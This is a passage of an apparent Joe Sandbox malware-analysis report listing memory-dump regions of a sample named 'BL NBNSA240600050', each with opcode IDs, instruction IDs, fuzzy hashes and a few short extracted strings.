                                    • Instruction Fuzzy Hash: A5417F71F002089FEB54DFA5C814BAEBBF6EF89300F208529E506AB395DB759C059B90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: PHkq
                                    • API String ID: 0-902561536
                                    • Opcode ID: 5fd1c7c5d44aec1811323f4b6a651c59de70e721aa2da49e5f6aecb334f67463
                                    • Instruction ID: 249c79d33ac2c63484d8003b4027077760424450a9526323eff866c33d4960fd
                                    • Opcode Fuzzy Hash: 5fd1c7c5d44aec1811323f4b6a651c59de70e721aa2da49e5f6aecb334f67463
                                    • Instruction Fuzzy Hash: 1B41A271E002099FDB61DF65D94069EBBB6FF85344F208529E406EB284DB74D94ACBC0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: PHkq
                                    • API String ID: 0-902561536
                                    • Opcode ID: 5435d32aeda000cf992d6ae6057e9dd4877f63775b95ccaaaa513259bd887ed9
                                    • Instruction ID: 9c036083592ba4c7ed00258895d54a92d4f2ab8b82d81c78f4af9a1b17829372
                                    • Opcode Fuzzy Hash: 5435d32aeda000cf992d6ae6057e9dd4877f63775b95ccaaaa513259bd887ed9
                                    • Instruction Fuzzy Hash: 59310132B002018FCF95AB74EA5476F7BE6AB89204F248428E506DB399EF35DD49C7D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: |
                                    • API String ID: 0-2343686810
                                    • Opcode ID: 50accb091c2debb283f4c998213960776d428a0e37583e65c428b93aa2aecb76
                                    • Instruction ID: bc2c8b7142430c5cd785e2f554f6992826184c5c6faeaacd6efedae9303f5380
                                    • Opcode Fuzzy Hash: 50accb091c2debb283f4c998213960776d428a0e37583e65c428b93aa2aecb76
                                    • Instruction Fuzzy Hash: 61117F75B102149FDB449B78D804B9E7BF5AF4C710F108469E50BE73A4DB35AD008B90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: |
                                    • API String ID: 0-2343686810
                                    • Opcode ID: 32ed00aaa43493640d8f6e8fc6775b2a6ee8cfb67b049a25387605ae465d6df6
                                    • Instruction ID: 4b95198247ec2f31c45df630c3fd485bad2fdb0e987732f2a11b3264546a0493
                                    • Opcode Fuzzy Hash: 32ed00aaa43493640d8f6e8fc6775b2a6ee8cfb67b049a25387605ae465d6df6
                                    • Instruction Fuzzy Hash: 65115E75B102149FDB449B78D844B6DBBF5AF4C710F108469E50AD73A4DB35A9008B90
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 79e491b8f2dfca421528ce342b25c9c2837aace2aba23be3b8dda9b8b0a47ea7
                                    • Instruction ID: 1a4bdc75f621675ac40d7c234cb7398397d10d067880ff4c0a3e62ff86942883
                                    • Opcode Fuzzy Hash: 79e491b8f2dfca421528ce342b25c9c2837aace2aba23be3b8dda9b8b0a47ea7
                                    • Instruction Fuzzy Hash: 3B61E1B2F001114FCF51AA7DD88466FAADBAFC4620B154439E80ADB379DE65DC0687D1
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cb870fbdefcc096fd473ef754107e8ec387ed3e734f90a0222c0d13da84cc498
                                    • Instruction ID: 08c390e1554d0696f8dddeead1ab9402e65c3aff0ccd0ba80cc0f772b3946849
                                    • Opcode Fuzzy Hash: cb870fbdefcc096fd473ef754107e8ec387ed3e734f90a0222c0d13da84cc498
                                    • Instruction Fuzzy Hash: B3815A35B002098FDF54DFA8D5547AEB7F6AF89300F108429E50ADB399EB34EC468B91
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cdc66cbcfd75897d32e4bf6777fae26d53f3baf02b88b9d898e66f9ae49b5490
                                    • Instruction ID: d1fe8120ebab25d29f0ee0c9dcc802c1e9bb6b3e4a3bce14d48eac503efdac0e
                                    • Opcode Fuzzy Hash: cdc66cbcfd75897d32e4bf6777fae26d53f3baf02b88b9d898e66f9ae49b5490
                                    • Instruction Fuzzy Hash: 34914031E106198FDF60DF68C890B9DB7B1FF89310F208695D549AB255DB70AE85CF90
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3ce8bd4cdadeeebe42469d775a793f2aee78befeab1e16ab394980ca783ea82e
                                    • Instruction ID: 0db7ab7854204cd4a40505f3b9ae8f7a7e8ec364aeb6e07d49a7d1c7f78d1038
                                    • Opcode Fuzzy Hash: 3ce8bd4cdadeeebe42469d775a793f2aee78befeab1e16ab394980ca783ea82e
                                    • Instruction Fuzzy Hash: AD913E31E106198BDF60DF68C890B9DB7B1FF89310F208699D549AB355DB70AE85CF90
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2cd37f4315c467e0e80b1d830196a5016f93ff21133be54cedcc783e3275dab0
                                    • Instruction ID: 791550e1b80e1bd49ff536cde05a096d626566ff6c0b8f6d729fba69faccc1c1
                                    • Opcode Fuzzy Hash: 2cd37f4315c467e0e80b1d830196a5016f93ff21133be54cedcc783e3275dab0
                                    • Instruction Fuzzy Hash: 63712771E002099FDB54DBA8D980A9EBBF6FF84300F148529E406AB359DB30ED46CB90
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8bb44d78d27d455aa225d6b21b34d2b4f64e55235741a17f9b0c2c7604bc5b53
                                    • Instruction ID: ee39ec3c281aae2e9fe89cb0470e846fa372fb9b65029d75fd58f0f7975c5785
                                    • Opcode Fuzzy Hash: 8bb44d78d27d455aa225d6b21b34d2b4f64e55235741a17f9b0c2c7604bc5b53
                                    • Instruction Fuzzy Hash: C1711871E002099FDB54DBA9D990A9EBBF6FF85300F148529E406AB359DB30ED46CB90
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7b5207849bf9919baad8309fd9c9a703365845152e6ebc521651fce5f40293ea
                                    • Instruction ID: 699b10afbe325ee140efcd08c0d06f01823e0634c7d4b53fa57f2f7be45d6711
                                    • Opcode Fuzzy Hash: 7b5207849bf9919baad8309fd9c9a703365845152e6ebc521651fce5f40293ea
                                    • Instruction Fuzzy Hash: 7151CF32E01105EFDB64AB78F4946ADBBB2EF84315F208869E007E7250DB35995ACBC0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f3639e28857443e57c1fb4867f502f0ee580a83562c422ad1c5dc4706cb6cf53
                                    • Instruction ID: bb91827dcf43fd552e3f3cf1db539c4e2b9ef937baec697b16b35ca987def899
                                    • Opcode Fuzzy Hash: f3639e28857443e57c1fb4867f502f0ee580a83562c422ad1c5dc4706cb6cf53
                                    • Instruction Fuzzy Hash: 1B51D971B102049FEF646A6CE99476F279FDB89310F20442EE00BD73E9CA29CC5987D1
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9d8b925aac1afc99d04893f01f9f3090e6af1f6a193f6631714bd9fd6c9364cb
                                    • Instruction ID: 15edb90f5700eed3d7d1480e96f83adad6a2b3cc3493d470925d4ad05942e772
                                    • Opcode Fuzzy Hash: 9d8b925aac1afc99d04893f01f9f3090e6af1f6a193f6631714bd9fd6c9364cb
                                    • Instruction Fuzzy Hash: 4E51C871B102149FEF646A6CE99472F379FDB89300F20482AE00BD73E8CA69CC5947E1
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0b009ba14d51fb8bbcd3bec0185f45b2184a70b81a2598ddd6cc7f9aa33cc9c8
                                    • Instruction ID: ef00f8298d6961ab0adcca2c061288221b54eeef0068c692d4a296e6b6ffe3e8
                                    • Opcode Fuzzy Hash: 0b009ba14d51fb8bbcd3bec0185f45b2184a70b81a2598ddd6cc7f9aa33cc9c8
                                    • Instruction Fuzzy Hash: 16418F72E002099FDF70CEA9E881AAFFBF5FB45324F10492AE156D7650D331A9498BD1
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 35633634f92871592ea43f5362848338f4c90149ab6ab09b6975edb9cb7a3a35
                                    • Instruction ID: 5d0b809b65436b8c0c4edfed50afc87d296913a32d9a1cb0825821210da275c7
                                    • Opcode Fuzzy Hash: 35633634f92871592ea43f5362848338f4c90149ab6ab09b6975edb9cb7a3a35
                                    • Instruction Fuzzy Hash: 0D319A31E106059BDB15DF65D854AAEFBB2FF89300F108828E906EB350DB31E946CB90
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b74ad77a288ef32b6be51cd5730531f2cfc1af4473b6a01459f5218a5d582b34
                                    • Instruction ID: 27532e60db4931a1fa71d900f9f54f2a0fbc7885fdb4782ca2751fe3da1422cb
                                    • Opcode Fuzzy Hash: b74ad77a288ef32b6be51cd5730531f2cfc1af4473b6a01459f5218a5d582b34
                                    • Instruction Fuzzy Hash: F0316935E106059BDB58CF65D9546AEF7F2FF89300F10C929E906EB354DB31A94ACB80
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f64ebd3180dcf96161ace1ab2a3bfb5f5426aa8fe6b3207d830609b8a3623bc5
                                    • Instruction ID: 47c2f29ace50b2402896a136955016b3454e6535dd925038912a0d8edda3671f
                                    • Opcode Fuzzy Hash: f64ebd3180dcf96161ace1ab2a3bfb5f5426aa8fe6b3207d830609b8a3623bc5
                                    • Instruction Fuzzy Hash: 9F217C75F002199FEB50DF69E980AEEB7F5EB49310F108029E905E7294E734E8418BE1
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4114272752.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_cbd000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 15ef4cd87494dae6966552677ccbf8ba596113d5014321b5c1d303eed2607b50
                                    • Instruction ID: 9c6daed83227c87cf20735bb0ba9f175915476ff3be1615baa381fbe85609b27
                                    • Opcode Fuzzy Hash: 15ef4cd87494dae6966552677ccbf8ba596113d5014321b5c1d303eed2607b50
                                    • Instruction Fuzzy Hash: DF316B7150D3C49FCB03DF24D990751BF71AB56214F29C5EBD8898F2A3D23A980ACB62
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a6e8e2f113d5a1647854bafe90a180c3de025d7687e710514a12b519d02dacad
                                    • Instruction ID: ae50e7b7efa035a6e0497c5d20284018f31305ad09c84aaebb48de979d0596da
                                    • Opcode Fuzzy Hash: a6e8e2f113d5a1647854bafe90a180c3de025d7687e710514a12b519d02dacad
                                    • Instruction Fuzzy Hash: 17218C76F006199FEB40DF69E980AAEB7F5FB49310F10802AE905E7394E734ED448B91
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4114272752.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_cbd000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2ae655254ad4ed85facc8243a0310088693e148816d9d31fe8179724d422ae7f
                                    • Instruction ID: bcc42a01da02e57c2cad9717f609a2dff11527e4b315a390e93c9aa8bd43a332
                                    • Opcode Fuzzy Hash: 2ae655254ad4ed85facc8243a0310088693e148816d9d31fe8179724d422ae7f
                                    • Instruction Fuzzy Hash: E5210171604204DFCB14EF14EAC0B66BBA5FB84314F24C66DE80A4B296D33AD847CB62
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4114272752.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_cbd000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: edb452b80af8b8ff7b915dcb74f2abf44fb16927ddb307a14bf67b5ba7d73c98
                                    • Instruction ID: 1decb21f6190c81ff2d902894b88cf2a686e54b56f05affbf8219bc303199f46
                                    • Opcode Fuzzy Hash: edb452b80af8b8ff7b915dcb74f2abf44fb16927ddb307a14bf67b5ba7d73c98
                                    • Instruction Fuzzy Hash: 61212671604300DFDB04DF18D9C0B2ABFA5FB84328F20C56DE80A4B351D33AD846CA61
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 478d5ad28c25ca108d298527422b544e28d9fc8667190a84ad5ae2d2fb7670eb
                                    • Instruction ID: a9615b0c0ba79fe282d9491fefbe07bab49d802e074109282ab2e5435d2097aa
                                    • Opcode Fuzzy Hash: 478d5ad28c25ca108d298527422b544e28d9fc8667190a84ad5ae2d2fb7670eb
                                    • Instruction Fuzzy Hash: C721DF32F100199FCF84EB69F96169EB7B6EB86310F108429E515EB384EB30ED058BC0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e5e5d03d3132dfa15dcccbe521cfcbff63119e5aadd8bff324f588a0bb0584f9
                                    • Instruction ID: d5cf4054b625bafc7c44e4e375c371301333bcb19a4ab2975b3fbf8802fbd74d
                                    • Opcode Fuzzy Hash: e5e5d03d3132dfa15dcccbe521cfcbff63119e5aadd8bff324f588a0bb0584f9
                                    • Instruction Fuzzy Hash: 1A11A136B105284FDF58AA79E8146AF73EAEBCA710F048439C506E7358EF25EC058BD1
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 61984f4e29ecbb78779c0d84343c7c38d65e8134cf1a8896a7b10fbb518b097e
                                    • Instruction ID: 598ee19ff71ba2c55da5fb3558d559d641a6b86cedfd93c8801e6039d61dd69f
                                    • Opcode Fuzzy Hash: 61984f4e29ecbb78779c0d84343c7c38d65e8134cf1a8896a7b10fbb518b097e
                                    • Instruction Fuzzy Hash: 8601F536B001510FD7619A3D941072BF7DADFC6710F10883AE50ACB395DE21DC4A83D2
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e587fb3a4cabd916b89a839911c9c639197077b13596ef9fe52587aef53d9d02
                                    • Instruction ID: 81e7311111aa21f624ca379a8d916be4f13d201066c83d210868f0f5e56bd915
                                    • Opcode Fuzzy Hash: e587fb3a4cabd916b89a839911c9c639197077b13596ef9fe52587aef53d9d02
                                    • Instruction Fuzzy Hash: 2F21C2B5D01259AFCB00CF9AD884ADEFBB4FB49324F10812AE518A7350D374A944CFE5
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f191005d20d0b8eb70a6f99e63384bfdf74b800c0c8beb262a9819c607636a49
                                    • Instruction ID: b9682cb3838565ea1eb53e02403d5df6a2b2bceaa65ded1d48ae590f73f227d3
                                    • Opcode Fuzzy Hash: f191005d20d0b8eb70a6f99e63384bfdf74b800c0c8beb262a9819c607636a49
                                    • Instruction Fuzzy Hash: A901F536B101101FC7919A3CA850B6BB7DAEB46710F108829E60EC7385DA25EC0583D1
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3b9a20a1fd85478a0b8e347441ee2a7a48ed6821916c21b8f2da4310ebae336f
                                    • Instruction ID: cb5de568505fbfde5665b12bb77186aee6c06452b81086d25c7459ae7cf86a49
                                    • Opcode Fuzzy Hash: 3b9a20a1fd85478a0b8e347441ee2a7a48ed6821916c21b8f2da4310ebae336f
                                    • Instruction Fuzzy Hash: 9F01FD32B104101FCB609A3CA850B3BABCADBCA724F14883AE50BCB348EE15DC0643D5
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4114272752.0000000000CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_cbd000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
                                    • Instruction ID: 1d12fc774e95b38eac2ddb1c3eca407dd479d2b850e4c3c5016893c6415729be
                                    • Opcode Fuzzy Hash: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
                                    • Instruction Fuzzy Hash: 5811DD75504280CFCB05CF14D9C4B19BFB2FB94328F24C6ADD84A4B662C33AD94ACB51
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f855c709895e2d215b05f6d9c0f9c66fd986d505520cdbe1054743fdc5a5cbff
                                    • Instruction ID: 783db250784737be14f20b441bf91fb7ec0c6d8f6d64c75ed2e65b11d9c94594
                                    • Opcode Fuzzy Hash: f855c709895e2d215b05f6d9c0f9c66fd986d505520cdbe1054743fdc5a5cbff
                                    • Instruction Fuzzy Hash: A201D436B101144BEF949A6D98146AF73EFDBCA710F04443AC506E3284EF649C0687E2
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c59acd4e0d39716e3d4696158c8dfa69ba766f39713af41ded154663ef2cfba4
                                    • Instruction ID: e312cef21800874c094c1ddee84c18082e2491074386148d56cb0c8a4e97486c
                                    • Opcode Fuzzy Hash: c59acd4e0d39716e3d4696158c8dfa69ba766f39713af41ded154663ef2cfba4
                                    • Instruction Fuzzy Hash: CE11D0B5D01259AFCB00CF9AD884ACEFBB4FB49320F10812AE918A7340D374A944CFE5
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 816ec679689866b129fc803263b88e2dbdf83be432a870641302430309cb749d
                                    • Instruction ID: 170d445c62e12ef76452f32da59f3d75658f7ee108324630eef4018a356e9ea6
                                    • Opcode Fuzzy Hash: 816ec679689866b129fc803263b88e2dbdf83be432a870641302430309cb749d
                                    • Instruction Fuzzy Hash: 62018137B104110BEBA4997DA45072BF3DADBCAB20F108839E50AC7388EE62DC4643D6
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: efb881d241346c8253c3e162b96d711a634dd31149ff8312470ed4b86c7f2b07
                                    • Instruction ID: 52c21997d501bdea506d202dafcbfc1202393871bfbef5c52e68455c729d3cc2
                                    • Opcode Fuzzy Hash: efb881d241346c8253c3e162b96d711a634dd31149ff8312470ed4b86c7f2b07
                                    • Instruction Fuzzy Hash: 9A01A436B104111FCB65997CA85073FABDADFC9764F148839E50ACB358EE15DC0643D5
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4539abdfe093b4334c4a81dcebf5df11f967d7fe5ee3a6cb5fc402b4e8b8b778
                                    • Instruction ID: 893657cb5eff5f9d57f785d981af5c3e98b33737b5bf0e56bdfd77e1a156e6d2
                                    • Opcode Fuzzy Hash: 4539abdfe093b4334c4a81dcebf5df11f967d7fe5ee3a6cb5fc402b4e8b8b778
                                    • Instruction Fuzzy Hash: 35018136B100104FCBA4AA7CE45072BB3DAEB86710F108829E60EC7784EF31EC0587C1
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4c50d9e6fc812ae42216469ad6e82bde487961b3d8c8170cad168de5c1275835
                                    • Instruction ID: 8424f916c7b3bd3db7d8a309b441a09a4dff6029c12f21ca991939bdac70b2d6
                                    • Opcode Fuzzy Hash: 4c50d9e6fc812ae42216469ad6e82bde487961b3d8c8170cad168de5c1275835
                                    • Instruction Fuzzy Hash: B5F0A732E30224ABDB146965E800A9AB77EE784754F104425E901E7388DB316905C7D0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f23b8b1ad90cd7a1a5e98a1ef4edd9f9a005c5e81806ef5422042330c2a1e8d7
                                    • Instruction ID: df07516eeed2bc3b193a530e6168e358e97b628c828221415ae038eb35d86a03
                                    • Opcode Fuzzy Hash: f23b8b1ad90cd7a1a5e98a1ef4edd9f9a005c5e81806ef5422042330c2a1e8d7
                                    • Instruction Fuzzy Hash: 1BE0D872D18248ABDF60CE70C94635AB7EDDB03314F2048B9D449CB141E277C90A9B91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.4145989982.00000000063D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_63d0000_BL NBNSA240600050.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                    • API String ID: 0-1324371161
                                    • Opcode ID: 6b2170d83bcc2b14c6e4d6d7f2e0eeeb25959d3e8239b47f85df049740fcba4c
                                    • Instruction ID: 1e29a41cb513dc8556101836c692330b62ee33b33b2317bdefa4fed6352fea1b
                                    • Opcode Fuzzy Hash: 6b2170d83bcc2b14c6e4d6d7f2e0eeeb25959d3e8239b47f85df049740fcba4c
